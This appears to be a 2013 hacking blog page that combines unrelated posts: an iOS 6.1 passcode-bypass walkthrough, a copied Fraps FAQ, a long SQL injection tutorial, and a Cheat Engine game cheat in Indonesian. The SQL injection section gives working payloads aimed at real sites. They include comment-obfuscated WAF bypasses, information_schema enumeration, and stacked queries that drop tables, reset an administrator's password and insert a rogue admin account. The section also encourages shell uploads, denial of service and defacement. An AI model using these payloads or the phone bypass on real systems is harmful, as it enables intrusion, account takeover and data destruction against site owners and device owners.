10 Mar 2013

0 How To Dodge iOS 6.1.2 Passcode - Vulnerability Exploited And Explained



                       

Apple has been a bit bitter past a few of its iOS releases making it that much easier for iOS device users to spit out what they chew. After the release of iOS 6.1.2, we imagined Apple to have gotten on its high horse to resolve security issues that haunted iOS 6.1. Unfortunately, our dreams remain shattered. Apple has been unable to fix 3G connectivity and Exchange Calendar bugs in iOS 6.


It seems like hackers have been able to by-pass iOS's security code once again. Founder and CEO of Vulnerability Lab, Benjamin Kunz Mejri, has described the two exploits discovered in full, giving us a tutorial on how to use them for our own benefit.

Vulnerability Lab's Benjamin Kunz Mejri posts:
A code lock bypass vulnerability via iOS as glitch is detected in the official Apple iOS v6.1 (10B143) for iPad & iPhone. The vulnerability allows an attacker with physical access to bypass via a glitch in the iOS kernel the main device code lock (auth). The vulnerability is located in the main login module of the mobile iOS device (iphone or ipad) when processing to use the screenshot function in combination with the emegerncy call and power (standby) button. The vulnerability allows the local attacker to bypass the code lock in iTunes and via USB when a black screen bug occurs. The vulnerability can be exploited by local attackers with physical device access without privileged iOS account or required user interaction. Successful exploitation of the vulnerability results in unauthorized device access and information disclosure.

For starters, you will be using the Emergency Call feature, the lock/sleep button and the screenshot feature. This will help you to by-pass the security code needed to access information on an iDevice.

In the first exploit, the hacker can penetrate the iDevice while placing the emergency call, cancelling the call while holding the lock/sleep button and bang! That's it. The hacker will be able to access the iDevice without the security code.

In the second exploit, the hacker needs to make the iPhone screen go black in order for him/her to plug in the iDevice into a computer through USB and access the phone without the PIN or security code.

You can by-pass iPhone, iPad or iPod's security by following the steps given below:

1. Make sure the code lock is activated.

2. Switch your device on by pressing the power button (top right).

3. The iDevice will come to life and the passcode lock will be visible on the screen.

4. Click on the Emergency Call.

5. Dial any random Emergency number such as 911 and hit call.

6. Disconnect the call immediately after so that the network does not connect to your dialled number.

7. Press power button and then the home button on your device.

8. Now, push the power button for three seconds, immediately followed by the home button and the emergency call button all at the same instance (without removing your finger off the other).

9. Take your finger of the home button first and then the power button.

10. The iDevice's screen, at this moment, will be black.

11. Connect your iDevice with you computer with a USB in this mode.

12. You will now have access to all files available in the system.

However, this method has its limitations too and we request our readers to attempt the above hack at their own risk and for their own knowledge.

If you have lost your iPhone, iPod or iPad, we would advice you to use the remote wipe-out feature to erase all your personal data from the iDevice before it gets into wrong hands.

Cheers!
- See more at: http://www.rafayhackingarticles.net/2013/02/how-to-dodge-ios-612-passcode.html#sthash.iHQ31efu.dpuf

6 Mar 2013

0 Free Download FRAPS.! Video Game Recorder

Frequently Asked Questions

General
FPS (Frames Per Second)
Screen Capture
Video Capture
Download : Here



General Questions


What do the options do?

Selecting "Start Fraps minimized" will hide the Fraps dialog screen when you launch the program. Fraps can still be accessed through the icon in the system tray.
Selecting "Fraps window always on top" will ensure the program window remains visible even when switching to another application. This option has no effect if Fraps has been minimized to the system tray.
If you'd like Fraps to be loaded when you turn on your machine enable the "Run Fraps when Windows starts" option.
Fraps also supports separate LCD screens on keyboards such as the Logitech® G15™. If you have a supported keyboard you will see the option to "Display status on keyboard LCD". Enabling this option will allow you to see FPS graphs and other identifiers on the keyboard while playing your games. If you have a G15 but do not see this option then you may need to install the latest G15 drivers available from Logitech's website.

Does Fraps have a performance impact on the game?

There is a small overhead associated with drawing the framerate on screen. This may vary depending on your system configuration, but should remain relatively minimal. The best way to measure it on your own system is to find a game that allows you to benchmark it and compare the results obtained with and without Fraps loaded.
When you are benchmarking the overlay is automatically disabled to provide the most accurate results.
If you are recording a movie with Fraps there can be a noticable impact on the game. This is due to all the extra work involved in saving the screen data to disk.


________________________________________
FPS (Frames Per Second)


What do the options do?

The Overlay Display Hotkey lets you assign a button that will toggle the frame rate counter between the four corners and off. To change the Hotkey, click in the box and type a new key to be assigned this function. Clicking Disable will stop the Hotkey from having any effect.
The Benchmarking Hotkey lets you assign a button that can be used to determine the average frame rate between any two points in a game. To change the Hotkey, click in the box and type a new key to be assigned this function. Clicking Disable will stop the Hotkey from having any effect.
The overlay corner indicates the region of the screen that the framerate counter will be displayed in. Choose a corner that doesn't obstruct important information in the game's display. If you select Disabled the frame rate counter will not be displayed on screen.
Selecting "Only update overlay once a second" will only change the frame rate counter once a second.
Selecting "Save frame rate to file each second" will output the frame rate once a second to the file FRAPSSEC.TXT in your Fraps directory. This option is deprecated and has been removed in Fraps 2.7.0. Use the detailed FPS statistics option to get individual CSV files for each benchmark run.
The "Stop benchmark automatically" option allows you to specify a fixed duration for the benchmark. Once the number of seconds has elapsed the benchmark will automatically stop and the results will be written to disk.
Finally, detailed benchmark statistics can also be saved to disk. These are written in standard CSV files that can be imported directly into a spreadsheet. All files are automatically named/timestamped and saved in the benchmarks subdirectory. Currently there are 3 files written for each benchmark when this option is enabled:
     FPS - Contains the frame rate value for each second of the benchmark
     frametimes - Contains the time (in milliseconds) of every frame that was rendered in the benchmark
     minmaxavg - Contains the total frame count, benchmark duration, minimum, maximum, and average frame rate values.

How can I average the framerate between two points?

While in the game press the key you assigned to the Benchmarking Hotkey. This will mark the start of where averaging is to take place. A green box is displayed to let you know that logging has begun, and then the counter is removed for maximum accuracy. When you want to end the benchmark, press the Hotkey again. The average framerate will now be displayed in a red box. Full details are also saved in the file FRAPSLOG.TXT in your Fraps folder, and into the benchmark directory if you have detailed statistics enabled.

What is the maximum framerate Fraps will show?

Fraps will show a maximum framerate of 9999 fps on screen. If you need to know precise framerates above this you must use benchmarking and find out the value from FRAPSLOG.TXT, or from the detailed statistics (if you have this option enabled).

Why doesn?t Fraps show above 30fps, 60fps, 75 fps (or any other framerate) in my game?

This can be due to several reasons.
Many games have internal limits that prevent them rendering faster than a certain framerate. In some cases this can mean they are locked at a maximum framerate of only 30fps.
Another possibility is that you have Vsync enabled. Vsync is used to synchronise the output of your graphics card with the display of your monitor. When your graphics card has finished rendering the next frame it waits for the monitor to finish displaying the current one before switching to the new one. This means that the maximum framerate you can obtain will be equal to the refresh rate of your monitor (which is usually 60hz, 75hz, 85hz, or 100hz).
If you disable Vsync then your graphics card will continuously render without waiting for the last frame to be displayed in its entirety. With fast graphics cards this means that your monitor may switch to a new frame halfway down the screen. This effect is known as tearing as there appears to be a visible line separating two different halves. Due to this, you should generally leave Vsync enabled except when benchmarking.


________________________________________
Screen Capture Questions


What do the options do?

You can select the folder where Fraps will store all screenshots in. By default this folder is the same as the directory you installed Fraps into, but you can customise it to save anywhere on your disk. Click the Change button to select a new folder, or the View button to show the current contents of the folder.
The Screen Capture Hotkey lets you assign a button that will take a screenshot of the game screen. To change the Hotkey, click in the box and type a new key to be assigned this function. Clicking Disable will stop the Hotkey from having any effect.
Screenshots can be saved in Windows Bitmap (BMP), JPEG (JPG), Portable Network Graphics (PNG), or Targa (TGA) format.
Selecting "Include frame rate overlay on screenshots" will include the Fraps frame rate counter on your screenshots. If the frame rate overlay is disabled, no counter will be saved on your screenshots.

What is the maximum resolution supported by the screen capture?

Screenshots can be taken in games running at resolutions up to 2880x1600 or 3840x1200.


________________________________________
Video Capture Questions


What do the options do?

You can select the folder where Fraps will store all movies in. By default this folder is the same as the directory you installed Fraps into, but you can customise it to save anywhere on your disk. Click the Change button to select a new folder, or the View button to show the current contents of the folder.
The Video Capture Hotkey lets you assign a button that will record movies of the game. To change the Hotkey, click in the box and type a new key to be assigned this function. Clicking Disable will stop the Hotkey from having any effect.
Choosing Half-size will store the movie at half the resolution of the game screen. Full-size will store the movie at the same resolution as the game screen.
You can choose the frame rate of the output movie from 25fps, 30fps, 50fps, 60fps, or a custom value up to 100fps. Higher values result in smoother playback but will increase the file size. Some video editing programs will treat movies recorded at 25fps as PAL, and those captured at 29.97/30fps as NTSC.
Selecting "Record Sound" will save the game audio along with the video. You can disable this option if you are planning to add your own sound to the video.
When you select "Detect best sound input" Fraps will determine the best input to record the game sound on. If you choose "Use Windows input" the default Windows recording input will be used. The Windows input may not capture all of the game sounds, so you should generally let Fraps detect the input unless you want to capture sound from an external source.

How do I record a movie while running a game?

First select the target framerate for the movie, which indicates how many frames will be included in the movie each second. You can currently choose from 25, 30, 50 or 60 fps.
In the game press the Video Capture Hotkey (F9) when you want to start recording. While recording the frame rate counter will turn red. When you want to end your movie, press the button again to stop recording. You will now find the movie saved in your default folder.

What is the maximum resolution supported by Half/Full-size video capture?

The maximum resolution for full-size and half-size capture is currently 7680x4800.

Why is the AVI movie generated by Fraps so big? How can I reduce the size?

The filesize is big because there isnt enough time to encode the movie while the game is running. The movie frames are slightly compressed, but still require a large amount of disk space due to the high resolutions. After you have finished capturing you can convert the clips into a compressed format using a video editing program. Probably the easiest one to use is Windows Movie Maker which is included free as part of Windows Live Essentials. It allows you to easily edit your clips and add text and other effects to your film. The end result will also be compressed into the Windows Media Video (WMV) format which can be played back in most media players.

How do I stop the frame rate counter being saved on my movies?

The frame rate counter shouldn't be saved on your movies. What you may be seeing is Fraps showing the frame rate of your media player. Try exiting Fraps before playing your videos and you should see clean images. If this doesn't help you can disable the frame rate counter before recording by pressing the Overlay Display hotkey.

When I view the movie I saved the video skips and the sound crackles. What's wrong?

Your media player may be having trouble keeping up with the large amount of data Fraps has written to disk. Fraps is optimised for processing large amounts of data, but many players are not. If they can't read the data fast enough skips in the video and audio may be present.
Keep in mind the raw data saved to disk should be fine. If you encode the video into a compressed format you will likely end up with a video file that plays perfectly due to the greatly reduced file size.
You can also lower the movie frame rate or use a lower resolution to reduce the data saved to the hard disk.

How can I adjust the volume of the sound that is recorded?

You must configure the volume through the "Sounds and Audio Devices" item in the Control Panel. Use the following steps:
     Click on the Control Panel and select Sounds And Audio.
     Click on the Audio tab.
     Find the Sound Recording device and click Volume.
     Adjust the volume for the Input that Fraps is recording from. This is usually named "What U Hear", "Record Master", or "Stereo Mixer".
If you can't see the correct Input on screen you may need to enable it by clicking on Properties in the menu and ensuring all Inputs have a check beside their name.

Where can I find the custom Fraps FPS1 codec?

The Fraps codec (FPS1) is put on the system when you install Fraps. If you've reinstalled Windows you will also need to reinstall Fraps in order to play back your movies.
Please keep in mind that if you want to give your raw footage to another person they will also need to have Fraps installed.

2 Mar 2013

0 All problem and Solution Related SQL injection



   

Today I'll write a tutorial for you that covers most problems while applying SQL injection and solutions to them. Probably every person who has looked at tutorials to hack a website have noticed that there are too many SQL tutorials. Almost every forum has 10 tutorials and blogs 5 tutorials about SQL injection, but actually those tutorials are stolen from somewhere else and the author most of the time doesn't even know why does SQL injection works. All of those tutorials are like textbooks with their ABC's and the result is just a mess. Everyone is writing tutorials about SQL, but nobody covers the problems what will come with that attack.
What is the cause of most problems related to SQL injection?

Webdevelopers aren't always really dumb and they have also heard of hackers and have implemented some security measures like WAF or manual protetion. WAF is an Web application firewall and will block all malicous requests, but WAF's are quite easy to bypass. Nobody will like to have their site hacked and they are also implementing some security, but ofcourse it will be false to say that if we fail then it's the servers fault. There's also a huge possibility that we're injecting otherwise than we should.
A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

If you're interested in WAF's and how they're working then I suggest you read it from wikipedia http://en.wikipedia.org/wiki/Application_firewall or from Open Web Application Security Project what's also known as OWASP

https://www.owasp.org/index.php/Web_Application_Firewall

Order by is being blocked?

It rarely happens, but sometimes you can't use order by because the WAF has blocked it or some other reason. Unfortunally we can't skip the order by and we have to find another way. The way is simple, instead of using Order by we have to use Group by because that's very unlikely to be blacklisted by the WAF.
If that request will return 'forbidden' then it means it's blocked.
 
http://site.com/gallery?id=1 order by 100--

Then you have to try to use Group by and it will return correct :
 
http://site.com/gallery?id=1 group by 100-- / success

Still there's a possibility that WAF will block the request, but there's one other way and that's not very widely known. It's about using ( the main query ) = (select 1)
 
http://example.org/news.php?id=8 and (select * from admins)=(select 1)

Then you'll probably receive an error like this : Operand should contain 5 column(s).
That error means that there are 5 columns and it means we can proceed to our next step what's union select. The command was different than usual, but the injection will be the same.
http://site.com/news.php?id=-8 union select 1,2,3,4,5--
'order by 10000' and still not error?

There's a small chapter where I'll tell you why sometimes order by won't work and you don't see an error. The difference between this capther and the last one is that previously your requests were blocked by the WAF, but here the injection method is a little bit different. When I saw that the first time then I thought about how a Database has 100000 columns because I'm not getting the error while the site is vulnerable?

The answer is quite logical. By trying order by 1000000 we're not getting the error because there are so many columns in there, we're not getting the error because our injection isn't working.
Example : site.com/news.php?id=9 order by 10000000000-- [No Error] 

to bypass this you just have to change the URL a little bit. Add ' after the ID number and at the end just enter +
Example :
site.com/news.php?id=9' order by 10000000--+[Error]

If the last example is working for you then it means you have to use it in the next steps also. This isn't anything complicated, but to make everything clear I'll still give you an example.
http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+


Extracting data from other database.


Sometimes we can administer the injection successfully and there doesn't appear any errors, it's a hacker's perfect dream. That dream will end the moment we see that nothing useful exists while doing so. There are only few tables and are called "News", "gallery" and "articles". They aren't useful at all because we'd like to see tables like "Admin" or "Administrator". Still we know that the server probably has several databases and even if we find the information we're looking for, you should still take a look within the other databases as well.

This will give you Schema names.
 
site.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata
And with this code you can get the tables from the schema.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from informati
on_schema.tables where table_schema=0x
This code will give you the column names.
site.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x and table_name=0x


I get error if I try to extract tables.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables

Le wild Error appears.
"you have an error in your sql syntax near '' at line 1"
Change the URL for this
 
site.com/news.php?id=9 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1-- 
 
 
How to bypass WAF/Web application firewall

The biggest reason why most the problems occur is due to most of the security measures added to the server and WAF, but mostly they're of no use and can be bypassed really easily. Mostly you will get error 404 like it's in the code below, this is WAF. Most likely persons who're into SQL injection and bypassing WAF's are thinking at the moment "Dude, only one bypassing method?", but in this case we both know that bypassing WAF's is a different kind of science and I could write a ebook on bypassing them. I'll answer all those bypassing queries another time.
"404 forbidden you do not have permission to access to this webpage"
The code will look like this if you get the error
http://www.site.com/index.php?id=-1+union+select+1,2,3,4,5--
[Error]
Change the url Like it's below.
http://www.site.com/index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5--
[No error]

Is it possible to modify the information in the database by SQL injection?


Most people aren't aware of it, but it's possible. You're able to Update, Drop, insert and select information. Most of people who're dealing with SQL injection have never looked deeper in the attack than shown in the average SQL injection tutorial, but an average SQL injection tutorial doesn't have those statements added. Most likely because most people are copy&pasting tutorials or just overwriting them. You might ask that why should one update, drop or insert information into the database if I can just look into the information to use the current ones, why should we make another Administrator account if there already exists one?

Reading information is just one part of the injection and sometimes those other commands that are quite infamous are more powerful than we think. If you have read all those avalible SQL injection tutorials then you're probably aware that you can read the information, but you didn't know that you can modify it. If you have tried SQL injection then you have probably faced some problems that there isn't an administrator account, why not use the Insert command to add one? There isn't an admin page to login, why not drop the table and all information so nobody can access it? I want to get rid of the current Administrator and can't change the password, why not use the update commands to change the password of the Administrator?
You must have noticed that I have talked alot about unneccesary information that you probably don't need to know, but that's the information you need to learn and understand to become a real hacker because you have to learn how SQL databases are working to fiqure out how those commands are working because you can't find tutorials about it on the network. It's just like math you learn in school, if you won't learn it then you'll be in trouble when you grow up.

Theory is almost over and now let's get to the practice.

Let's say that we're visiting that page and it's vulnerable to SQL injection.
http://site.com/news.php?id=1
You have to start injecting to look at the tables and columns in them, but let's assume that the current table is named as "News".

With SQL injection you can SELECT, DROP, UPDATE and INSERT information to the database. The SELECT is probably already covered in all the tutorials so let's focus on the other three. Let's start with the DROP command.

I'd like to get rid of a table, how to do it?
http://site.com/news.php?id=1; DROP TABLE news

That seems easy, we have just dropped the table. I'd explain what we did in the above statement, but it's quite hard to explain because you all can understand the above command. Unfortunally most of 'hackers' who're making tutorials on SQL injection aren't aware of it and sometimes these three words are more important than all the information we can read on some tutorials.

Let's head to the next statement what's UPDATE.
 
http://site.com/news.php?id=1; UPDATE 'Table name' SET 'data you want to edit' = 
'new data' WHERE column_name='information'--

Above explanation might be quite confusing so I'll add a query which is what you're most likely going to use in real life :
http://site.com/news.php?id=1; UPDATE 'admin_login' SET 'password' = 'Crackhackforum' WHERE login_name='Rynaldo'--
We have just updated Administrator account's password. In the above example, we updated the column called 'admin_login" and added a password what is "Crackhackforum" and that credential belongs to the account with the username Rynaldo. Kinda heavy to explain, but I hope you'll understand.
How does INSERT work?
Luckily "INSERT" isn't as easy as the "DROP" statement, but still quite understandable. Let's go further with Administrator privileges because that's what most of people are heading to. Adding an administrator
account would be like this :
http://site.com/news.php?id=1; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (2,'Rynaldo','Crackhackforum','NA')--
INSERT INTO 'admin_login' means that we're inserting something to 'admin_login'. Now we have to give instructions to the database, about what exact information we want to add, ('login_id', 'login_name', 'password', 'details'). Means that the specifications we're adding to the DB are Login_id, Login_name, password and details and the information the database needs to create a new account. So far we have told the database what information we want to add, we want to add a new account, password, account ID and details. Now we have to tell the database what will be the new account's username, it's password and account ID, VALUES (2,'Rynaldo','Crackhackforum','NA')-- . That means account ID is 2, username will be Rynaldo, password of the account will be Crackhackforum. Your new account has been added to the database and all you have to do is open up the Administrator page and login.
Passwords aren't working

Sometimes the site is vulnerable to SQL and you can get the passwords. Then you can find the site's username and password, but when you enter it into adminpanel then it shows the "Wrong password" error. This can be because those usernames and passwords are there, but aren't working. This is made by site's admin to confuse you and actually the Cpanel doesn't contain any username/password. Sometimes accounts are removed, but the accounts are still in the database. Sometimes it isn't made by the admin and those credentials have been left in the database after removing the login page, sometimes the real credentials have been transfered to another database and old entries haven't been deleted.
Sometimes I get some weird password
This weird password is called Hash and most likely it's MD5 hash. That means the site's admin has added more security to the website and has encrypted the passwords. Most popular crypting way is using MD5 hash. The best way to crack MD5 hashes is using PasswordsPro or Hashcat because they're the best and can crack the password even if it's really hard or isn't MD5. Also you can use http://md5decrypter.com. I don't like to be a person who's pitching around with small details that aren't correct, but here's a tip that you should keep in mind. The domain is saying it's "md5decryptor" that reffers to decrypting MD5 hashes.
Actually it's not possible to decrypt a hash because they're having 'one-way' encryption. One way encryption means it can only be encrypted, but not decrypted. Still it doesn't mean that we can't know what the hash means, we have to crack it. Hashes can't be decrypted, only cracked. Those online sites aren't cracking hashes every time, they're saving already cracked hashes & results to their database and if you'll ask a hash what's already in their database, you will get the result. :)
Md5 hash looks like this : 827ccb0eea8a706c4c34a16891f84e7b = 12345
You can read about all Hashes that exist and their description http://pastebin.com/aiyxhQsf
Md5 hashes can't be decrypted, only cracked
How to find admin page of site?
Some sites don't contain admin control panel and that means you can use any method for finding the admin page, but that doesn't even exist. You might ask "I got the username and password from the database, why isn't there any admin login page then?", but sometimes they are just left in the database after removing the Cpanel.
Mostly people are using tools called "Admin page finders". They have some specific list of pages and will try them. If the page will give HTTP response 200 then it means the page exists, but if the server responds with HTTP response 404 then it means the page doesn't exist in there. If the page exists in the list then the tool will say "Page found". I don't have any tool to share at the moment, but if you're downloading it yourself then be beware because those tools might beinfected with viruses.
Mostly the tools I mentioned above, Admin Page Finders doesn't usually find the administrator page if it's customly made or renamed. That means quite oftenly those tools don't help us out and we have to use an alternative and I think the best one is by using site crawlers. Most of you are probably having Acunetix Web Vulnerability scanner 8 and it has one wonderful feature called site crawler. It'll show you all the pages on the site and will 100% find the login page if there exists one.
Automated SQL injection tools.
Automated SQL injection tools are programs what will do the whole work for you, sometimes they will even crack the hashes and will find the Administrator page for you. Most people are using automated SQL injection tools and most popular of them are Havij and SQLmap. Havij is being used much more than SQLmap no matter the other tool is much better for that injection. The sad truth why that is so is that many people aren't even able to run SQLmap and those persons are called script-kiddies. Being a script-kiddie is the worst thing you can be in the hacking world and if you won't learn how to perform the attack manually and are only using tools then you're one of them.
If you're using those tools to perform the attack then most people will think that you're a script-kiddie because most likely you are. Professionals won't take you seriously if you're injecting with them and you won't become a real hacker neither.

 My above text might give you a question, "But I've seen that even Proffesional hackers are using SQLmap?" and I'd like to say that everything isn't always black & white. If there are 10 databases, 50 tables in them and 100 columns in the table then it would just take days to proccess all that information. I'm also sometimes using automated tools because it makes my life easier, but to use those tools you first have to learn how to use those tools manually and that's what the tutorial above is teaching you.
Use automated tools only to make your life easier, but don't even look at them if you don't know how to perform the attack manually.

What else can I do with SQL injection besides extracting information? There are many things besides extracting information from the database and sometimes they are much more powerful. We have talked about how sometimes the database doesn't contain Administrator's credentials or you can't crack the hashes. Then all the injection seems pointless because we can't use the information we have got from the database. Still we can use another methods. Just like we can conduct CSRF attack with persistent XSS, we can also move to another attacks through SQL injection. One of the solution would be performing DOS attack on the website which is vulnerable to SQL injection. DOS is shortened from Denial of service and it's totaly different from DDOS that's Distributed Denial of Service. I think that you all probably know what these are, but if I'm taking that attack up with a sentence then DOS will allow us to take down the website temporarily so users won't have access to the site. The other way would be uploading our shell through SQL injection. If you're having a question about what's shell then by saying it shortly, it's a script what we'll upload to the server and it will create an backdoor for us and will give us all the privileges to do what we'd like in the server and sometimes by uploading a shell you're having more rights to modify things than the real Administrator has. After you have uploaded a shell you can move forward to symlink which means that we can deface all the sites that are sharing the same server. Shelling the website is probably the most powerful thing you can use on the website. I have not covered how to upload a shell through SQL injection and haven't covered how to cause DOS neither, but probably will do in my next tutorials because uploading a shell through SQL is another kind of science, just like bypassing WAF's. Those are the most common methods that attackers will put in use after they can't get anything useful out of the database. We have all heard that immagination is unlimited and you can do whatever you'd like. That's kinda true and hacking isn't an exception, there are more ways than I can count.

What to do if all the information doesn't display on the page?
I actually have rarely ever seen that there is so much information on the webpage that it all just doesn't fit in there, but one person recently asked that question from me and I decided to add it here. Also if you're having questions then surely ask and I'll update the article. If we're getting back to the question then the answer is simple, if all the information can't fit in the screen then you have to look at the source code because everything displayed on the webpage will be in there. Also sometimes information will appear in the tab where usually is the site's name. If you can't see the information then sometimes it's hidden, but with taking a deeper look you might find it from the source. That's why you always have to look all the solutions out before quiting because sometimes you might think "I can't inject into that..", but actually the answer is hidden in the source.
- See more at: http://www.rafayhackingarticles.net/2013/02/solutions-related-to-sql-injection.html#sthash.eDKMK6Ce.dpuf

0 Baseball Heroes Combo Hack

Tools :



Vist :- http://youtu.be/5czmuAbCXp8 - http://youtu.be/Wao9ioNjTL4
Step :

  • Download dan Instal cheat engine
  • Buka applikasi game Baseball Heroes
  • Buka Cheat Engine
  • Klik "Play Ball"
  • Dalam Cheat Engine pilih :


    1. Process Plugin-Container.axe untuk Firefox.
    2. Chrome.axe untuk Google Chrome (NB : Untuk Google Chrome harus dicoba satu-persatu)
    3. Kemudian : Buka Baseball
      Klik Play Buka "CE" Klik Open Folder Samping Proses Lihat Gambar Pada Angka (1)

      Ambil Data "ComboPoint1" Yg sudah Kamu DownLoad Tadi Trus AktifkanLihat gambar pada angka (2)  Dan Buka Bekas Yang Anda Download tadi


                  Good Luck Slamat Mencoba       
 

Devil Dawn [ Irzzat Badut ] Copyright © 2011 - |- Template created by O Pregador - |- Powered by Blogger Templates